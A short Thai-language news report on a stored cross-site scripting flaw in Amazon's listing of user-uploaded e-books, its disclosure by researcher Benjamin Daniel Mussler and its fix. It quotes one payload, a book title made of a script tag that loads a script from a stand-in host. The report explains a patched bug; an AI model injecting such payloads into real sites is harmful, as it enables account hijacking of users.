มีรายงานช่องโหว่ของหน้าเว็บอเมซอนในส่วนของรายการหนังสือที่อัพโหลดโดยผู้ใช้ ทำให้แฮกเกอร์ที่ล่อให้ผู้ใช้อัพโหลดหนังสือเอง เช่น หนังสือเถื่อน สามารถขโมยบัญชีอเมซอนออกไปได้

ช่องโหว่นี้เป็นเพราะอเมซอนนำชื่อหนังสือไปแสดงบนหน้าเว็บโดยตรง ทำให้แฮกเกอร์สามารถตั้งชื่อหนังสือกลายเป็น <script src="https://www.example.org/script.js"></script> เพื่อให้หน้าเว็บโหลดเอาสคริปต์ขึ้นไปรัน

Benjamin Daniel Mussler นักวิจัยที่พบปัญหานี้รายงานปัญหาไปตั้งแต่ปลายปีที่แล้วและทางอเมซอนก็แก้ไปแล้วรอบหนึ่ง แต่ล่าสุดเมื่อกลางปีที่ผ่านมาอเมซอนก็ปรับหน้าเว็บทำให้มีปัญหานี้อีกครั้ง Mussler รายงานไปอีกครั้งแต่ไม่มีการตอบกลับเป็นเวลาสองเดือนเต็ม ทำให้เขาเปิดเผยบั๊กนี้สู่สาธารณะ และทางอเมซอนก็แก้ปัญหาในสี่วัน

ทางที่ดีระวังการดาวน์โหลดหนังสือจากแหล่งที่ไม่น่าไว้ใจกันไว้ครับ

ที่มา - B.FL7.DE